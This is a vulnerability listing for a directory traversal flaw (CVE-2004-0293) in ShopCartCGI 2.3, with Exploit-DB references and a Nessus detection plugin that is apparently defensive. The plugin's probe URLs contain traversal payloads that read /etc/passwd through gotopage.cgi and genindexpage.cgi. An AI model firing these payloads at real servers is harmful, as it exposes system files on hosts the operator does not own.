Vulnerabilities > CVE-2004-0293 - Remote File Disclosure vulnerability in Shopcartcgi 2.3

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
NONE
Availability impact
NONE
network
low complexity
shopcartcgi
nessus
exploit available

Summary

Directory traversal vulnerability in ShopCartCGI 2.3 allows remote attackers to retrieve arbitrary files via a .. (dot dot) in a HTTP request to (1) gotopage.cgi or (2) genindexpage.cgi.

Vulnerable Configurations

Part Description Count
Application
Shopcartcgi
1

Exploit-Db

  • description: ShopCartCGI 2.3 genindexpage.cgi Traversal Arbitrary File Access. CVE-2004-0293. Webapps exploit for cgi platform
    id: EDB-ID:23706
    last seen: 2016-02-02
    modified: 2004-02-16
    published: 2004-02-16
    reporter: G00db0y
    source: https://www.exploit-db.com/download/23706/
    title: ShopCartCGI 2.3 genindexpage.cgi Traversal Arbitrary File Access
  • description: ShopCartCGI 2.3 gotopage.cgi Traversal Arbitrary File Access. CVE-2004-0293. Webapps exploit for cgi platform
    id: EDB-ID:23705
    last seen: 2016-02-02
    modified: 2004-02-16
    published: 2004-02-16
    reporter: G00db0y
    source: https://www.exploit-db.com/download/23705/
    title: ShopCartCGI 2.3 gotopage.cgi Traversal Arbitrary File Access

Nessus

NASL family: CGI abuses
NASL id: SHOPCARTCGI_TRAVERSAL.NASL
description: The remote host is running ShopCartCGI - a set of CGIs designed to set up an on-line shopping cart. The version of ShopCartCGI on the remote host fails to sanitize input to several of its CGI scripts before using it to read and display files. An unauthenticated, remote attacker can leverage these issues to read arbitrary files on the remote web server with the privileges of the web user.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 12064
published: 2004-02-17
reporter: This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/12064
title: ShopCartCGI Multiple Script Traversal Arbitrary File Access
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

# Registration branch: when the engine loads the plugin with `description`
# set, only the metadata calls below run and the script exits before any
# network activity.
if(description)
{
 script_id(12064);
 script_version ("1.23");

 # Same CVE as the page header; BID 9670 is the matching Bugtraq entry.
 script_cve_id("CVE-2004-0293");
 script_bugtraq_id(9670);
 
 script_name(english:"ShopCartCGI Multiple Script Traversal Arbitrary File Access");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a CGI application that is affected by 
multiple arbitrary file access issues." );
 script_set_attribute(attribute:"description", value:
"The remote host is running ShopCartCGI - a set of CGIs designed to set
up an on-line shopping cart. 

The version of ShopCartCGI on the remote host fails to sanitize input
to several of its CGI scripts before using it to read and display
files.  An unauthenticated, remote attacker can leverage these issues
to read arbitrary files on the remote web server with the privileges of
the web user." );
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2004/Feb/454");
 # No vendor fix was known when the plugin was written; the finding is
 # reported as a warning rather than a hole below.
 script_set_attribute(attribute:"solution", value:
"Unknown at this time." );
 # CVSSv2 base vector matching the 5.0 / MEDIUM score on the listing:
 # network, low complexity, no auth, partial confidentiality impact only.
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 # NOTE(review): Exploit-DB lists entries 23705/23706 for this CVE, and the
 # temporal vector above says E:POC; "false" here presumably reflects
 # Tenable's "no exploit is required" classification -- confirm.
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"false");

 script_set_attribute(attribute:"plugin_publication_date", value: "2004/02/17");
 script_set_attribute(attribute:"vuln_publication_date", value: "2004/02/17");
 script_cvs_date("Date: 2018/11/15 20:50:18");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();

 
 script_summary(english:"Checks ShopCart");
 
 # ACT_GATHER_INFO: the probe only reads a response; it does not modify
 # anything on the target.
 script_category(ACT_GATHER_INFO);
 
 script_copyright(english:"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.");
 script_family(english:"CGI abuses");
 # Runs after service/HTTP detection; presumably find_service1.nasl populates
 # the Services/www key required on the next line -- confirm.
 script_dependencie("find_service1.nasl", "http_version.nasl");
 script_require_ports("Services/www", 80);
 # Skipped when the scan policy disables CGI scanning (key name is literal).
 script_exclude_keys("Settings/disable_cgi_scanning");
 exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

# HTTP port to probe; falls back to 80 when no web service was detected.
port = get_http_port(default:80);

# An /etc/passwd "root" entry in the response shows the CGI returned a file
# from outside its document tree (the traversal succeeded).
passwd_re = ".*root:.*:0:[01]:.*";

foreach dir (cgi_dirs())
{
 # gotopage.cgi is always probed; genindexpage.cgi only when the scan
 # policy enables thorough tests. Order matches the original checks.
 probes = make_list(strcat(dir, "/gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd"));
 if (thorough_tests)
   probes = make_list(probes, strcat(dir, "/genindexpage.cgi?4242+Home+/../../../../../../../../../../../../../etc/passwd"));

 foreach url (probes)
 {
   res = http_send_recv3(method:"GET", port:port, item:url);
   # A missing reply aborts the whole plugin with exit code 1.
   if (isnull(res)) exit(1, "The web server on port "+port+" did not answer");

   # Status line, headers and body are searched as one string.
   page = strcat(res[0], res[1], '\r\n', res[2]);
   if (egrep(pattern:passwd_re, string:page))
   {
     # One positive per host is enough; report and stop.
     security_warning(port);
     exit(0);
   }
 }
}